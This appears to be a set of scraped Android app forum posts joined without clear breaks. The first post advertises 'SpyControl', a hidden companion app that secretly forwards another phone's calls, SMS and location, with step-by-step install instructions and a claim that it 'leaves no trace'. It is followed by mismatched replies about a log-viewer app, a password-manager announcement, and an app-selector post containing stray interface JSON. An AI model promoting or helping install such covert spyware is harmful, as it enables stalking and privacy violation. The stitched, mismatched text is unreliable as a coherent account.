[APP][2.1+][v1.0] SpyControl

SpyControl serves to monitor Phone Calls, SMS and location of one or more Android terminals.
The sender sends the information to our central server, where the data is stored and encrypted,
and later be retrieved by this Application.
This application is useful to know what your children do and where they are, find the location in case of theft or loss, and among others.
To obtain such data is required to install the application "InfoActivity" on the phone who wants to get the data, available at this URL: http://diegoyarza.com/info
This application leaves no trace, is not in the application list, so just follow these instructions:
1) Install the application on the Android terminal which wants to spy
2) Put the widget on the desktop and press it
3) When pressed the terminal ID appears to be copied
4) Then add the ID copied to your SpyControl to start watching all their data.
5) Remove the widget
The service will start automatically when the terminal restarts.
No subscription, no additional cost.
Simple, intuitive and easy to use.
SpyControl consists of four tabs:
- Spy: User list
- SMS: Sms from the selected user*
- Phone Calls: Phone calls from the selected user*
- Maps: Map (from Google) with the selected user position**
* Only the last 100 records show.
** Use GPS or network data, as available.
Refund up to five days.

nice-looking app..
why is there an additional "Full Network Access" permission which is not present in the CatLog app?

Click to expand...
Click to collapse
The "Full Network Access" permission is used to report crashes of the app using Crashlytics. The source is all open - I'm not doing anything sneaky
Hello and Thank you for this very useful tool!
Will you please consider making the search persistent?
This way whenever the app is restarted it will come back to the same last search it used, if there was any, last time.
Most convenient, don't you think?
Having an option for a Regular Expression search may be nice as well.
Good luck!
Keep up this nice project!
Great app, @plusCubed!
I noticed that the MatLog folder is not accessible on the computer from the phone. Just as a feature request, could you add a save location selector in the "Save As" menu?
Regardless, I love the app and use it all the time. Thank you!

[APP][5.0+] GeniPass - A Deterministic Password Manager

GeniPass is a deterministic password manager that uses child key derivation cryptography to securely derive your passwords at runtime. What does this mean? It means GeniPass uses math to "load" (calculate) your passwords rather than store them in a database or on some server. Go to the second post to see the changelog and download the apk or download from the Play Store.
It works by deriving large random number from each other until it uses one of the random numbers to look up words in a dictionary, creating your password (for why see here.) If you're interested in more technical info in this cryptosystem see the readme. This app can also be used to test the strength of the passwords you already use. It will give you a rough estimation of how long it'll take someone to brute force the password.
Your passwords will be available across all devices running this app without needing to sync any data with some server. You don't need to worry about me stealing your passwords or uploading them to a server because I don't have a server and GeniPass can't open any network connections (it doesn't have the right permissions).
Screen shots are available at the bottom of this post.
GeniPass is open source! The source code is available here.
GeniPass is "Pending Publication" in the Play Store but the link will be here soon, in the mean time you can download the apk from the second post.
As a rule of thumb this app only with on devices with +1 GB of RAM, if it runs on a device with less than that please let me know.
Download latest apk.

Unique App #2: appSelector

appSelector - Apps on Google Play
Select automatically for each mime-type or website the browser to open a URL
play.google.com
Android allows you to select a default app for specific activity. The implementation is pretty broad, and limited too depending on the OEM version of the software.
But if you want to customise this behaviour further, there is a nifty app called appSelector that allows you to choose the browser or app to use for a specific site. It allows granular control over the Default browser feature of Android.
This is also useful if the browser you use doesn't support the 'Open in App' feature:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
As you can see in the screenshot above, if I open a Play Store link in my Firefox browser, I have the option to choose whether to open that link in the corresponding Android app. Some browsers, however, don't provide this option. This app comes in handy in such cases too. Just set up the site in this app.
Next time you need to open a site in its app, simply use the share menu in the browser and choose appSelector:
The link will now automatically open in the right app/ browser that you want it to.
That's it.
You'll find more such unique apps here:
Unique Apps for Android
In this post, I will include some unique apps I have found that do not have competing alternatives (or let's say, I haven't found anything close enough to compete). 1. FolderSync 2. appSelector 3. Photo Tools 4. Hermit I will keep updating this...
